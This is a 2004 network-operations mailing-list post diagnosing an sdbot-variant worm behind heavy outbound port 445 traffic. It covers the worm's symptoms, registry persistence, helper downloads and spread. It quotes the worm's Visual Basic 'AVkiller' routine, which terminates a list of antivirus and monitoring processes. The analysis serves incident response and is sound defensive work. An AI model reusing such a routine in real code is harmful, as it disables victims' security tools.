Excessive Internet Traffic

Wed Sep 15 18:01:25 UTC 2004

// The packets are small, since I am seeing a large nuber of packets, but
// the bit count is low.
//  30 second input rate 72679000 bits/sec, 41033 packets/sec
//  30 second output rate 29208000 bits/sec, 7687 packets/sec
// Input bits per second are a little above normal, but the packet count
// would normally be under 10000 not 41000.
//
// Ideas?

This is likely a variant of what I forsee to become the "next big pain", a
variant of sdbot, of which McAfee claims there are 4000 variants.

I've had to deal with quite a few (and climbing) numbers of infected users
of this pain. We use a Packeteer and have listed comps sending outbound
445 garbage and I've found that almost all have been infected by one of
the versions of this particular worm. Which of the 4000 versions it is
eludes me.

This is what I've seen so far. If you look at the machine sending the
traffic out, you're likely going to see a smorgasbord of junk in
c:\WINDOWS\system32 ... If you view the folder as a list, then sort by
date, you're likely to find a huge amount of executables on the machine.
As well as logs, TFTP information etc.

You can try opening up task manager but it will be useless...

So being I'm already getting more and more familiar with this pest, here
is what it does:

/////
Public Sub AVkiller()
On Error Resume Next
'prefix
Dim AVmonz As Variant                                                '
varz:
Dim Cur As String
'---||---
Dim i
'---||---
AVmonz = Array("", "AVP Monitor", _
                   "AntiVir", _
                   "Vshwin", _
                   "F-STOPW", _
                   "F-Secure", _
                   "vettray", _
                   "InoculateIT", _
                   "Norman Virus Control", _
                   "navpw32", _
                   "Norton AntiVirus", _
                   "Iomon98", _
                   "AVG", _
                   "NOD32", _
                   "Dr.Web", _
                   "Amon", _
                   "Trend PC-cillin", _
                   "File Monitor", _
                   "Registry Monitor", _
                   "Registry Editor", _
                   "Task Manager")
'Declaration of AV shitz
For i = 1 To 20
'kill'em all...
 Cur = AVmonz(i)
'convert to string
 Call TerminateTask(Cur)
'terminate task ;)
Next i
End Sub

/////

Nifty huh? The virus installs itself in the registry under odd names
associated with Microsoft for example, so far I've seen it installed in a
Run, Run Once folder called Windows Security, Windows Update, etc. There
is no removal tool for this and being it renders many virus software
useless, you can either have a user reinstall Windows, or you can search
the machine for instances of things created on the same date as the
serv32.exe program, or one of the other ones it installs.

Now... The worm seems to perhaps download 4 other programs I've always
seen running in conjuction with it. wupd.exe which masquerades as "Windows
Update" ftpd.exe which opens up an ftp server on the infected machine and
goes around re-downloaded various other viruses and worms on the infected
machine, and one which I believe tries to infect other machines perhaps
a-la Blaster worm.

Another program opens seems to randomly name viruses and worms once
downloaded so for example, wupd.exe will probably turn into something like
A032424.exe the next time around, and so on and so forth.

So far I've seen students where I am either getting this via file sharing,
one program which has been sticking out like a sore thumb is something
called ARES. It could be also spreading, again, through some of the
katrillion MS vulnerabilies and perhaps even the newly discovered "Drag
and Drop" vulnerability.

Drag and Drop vulnerabilities
http://secunia.com/advisories/12321/

So now there is also the "bling.exe" issue which is the worm that "sniffs
out passwords" (http://isc.sans.org/diary.php?date=2004-09-12), this one
opens up an irc connection to dump out data to some channel. I will
eventually (when I have some time) hexedit some of these to see what it
does and perhaps repost more information.

For a full view of what the serv32.exe does, please check out the coding
at http://www.infiltrated.net/wormcode.txt which list the original URL
(site down so it's Google cached)

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x51F9D78D
Fingerprint 2A48 BA18 1851 4C99

CA22 0619 DB63 F2F7 51F9 D78D
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x51F9D78D

sil @ politrix . org    http://www.politrix.org
sil @ infiltrated . net http://www.infiltrated.net

"How can we account for our present situation unless we
believe that men high in this government are concerting
to deliver us to disaster?" Joseph McCarthy "America's
Retreat from Victory"